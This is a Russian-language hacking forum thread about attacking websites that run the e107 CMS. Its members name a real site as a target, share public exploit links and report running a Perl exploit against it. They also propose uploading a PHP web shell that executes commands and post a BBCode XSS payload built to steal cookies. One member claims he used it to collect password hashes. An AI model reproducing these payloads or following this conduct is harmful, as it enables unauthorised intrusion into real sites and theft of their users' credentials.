Хотелеось бы ипытать его на прочность я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен... первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории : e107_admin,e107_docs,e107_files,e107_handlers,e107_images,e107_languages,e107_plugins,e107_themes но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так www.sait.net/e107_plugins/autogallery/autogallery.php?show=любой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более... и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1
Tikson, в след. раз пиши так, чтобы твой урл не был реальным сайтом..) например, http://[example]/e107_plagins/etc.. Теперь по теме. Вот тебе 2 эксплоита). http://milw0rm.com/id.php?id=1106 http://milw0rm.com/id.php?id=704
Rebz спасибо =))) ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =) СПАСИБО!!!
Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704 есть вопрос что значит "b4d upload!!" я все делал как в сплоите написано perl 1\e107.pl www.nradio.ru 1 - это папка в которой у меня лежит сплоит и вмне значит выводится сообщение ## www.nradio.ru ## b4d upload!! что это начит??? и как от этого танцевать????
гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..
Помоему та стоит закачка файла с адреса http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php но выдаётся какая-то ошибка.... Попробуй зафигачь свой и в файле пропиши <? echo "<pre>"; sysem($cmd); echo "</pre>"; ?> Мож получится.
http://nradio-ru.mitos.ru/e107_handlers/htmlarea/popups/ImageManager/images.php картинку удалить у меня не получилось((( может дело в этом
Да... возможно, они на папочку upload поставили права не 777. -) В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).
да нихрена я не сделал...((( файл images.php у них там поумолчанию уже находился, как я понял ксплойд использует уязвимость в этом файле для того чтобы закачать на сервер свой... Но как сказал Rebz они наверно там права на запись отрубили... поэтому не удлить не закачать скрипт не получится... Хотя можно попробовать в другую директорию им кинуть, вообщем поэксперементировать. А вообще попробуй лучше XSS времени меньше потратишь: захреначил его и пошёл пивко пить, пишёл хеши собрал пароли нашёл и всё... ЗЫ: Это конечно в идеале, а на самом деле хз как получится...
тоест ты предлагаешь вот это ############################## www.ut[url=http://www.s=''style='fo...ent.cookie;this.sss=null`style='font-size:0;][/url]' ############################## тока ничего не получается я когда это в подпись вставил то ничего небыло видно однако почумуто была ковычка видимо что то не так ??? ps может их умоломать поставить права 777 мол так сайт лючше работать будет хотя непохоже что админ лопух он одминит по крайне мене еще 5 сайтов в том числе и сайт http://www.e107.ru/
[cоlor=#EFEFEF][иrl]www.ut[иrl=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=alert();this.sss=null`style='font-size:0;][/иrl][/url]'[/cоlor] У меня всё работает.... Действуй! токо перепиши, я там "о" русскую поставил и "и" заместо "u"
Мда... какой-то сраненький форум.... Я тут 5 дней уже Ipb ломаю там ася у чела как у меня мобильный - ну очень хочется... А тут за 2 часа всё ясно и понятно
Kond4r Молоца !!! Как хеши раздобыл, с помошью xss ? Исходник который ты использовал можешь привести(полный)? ps этот "neo" радиcт-шифровщик какой-то, его MD5 хеш бруту не поддается, буду в куки пихать...
это двойной хэш... так просто его не подберёшь... Да ХSS. А исходник тот который Rebz дал, я там токо адрес снифера сменил на свой...
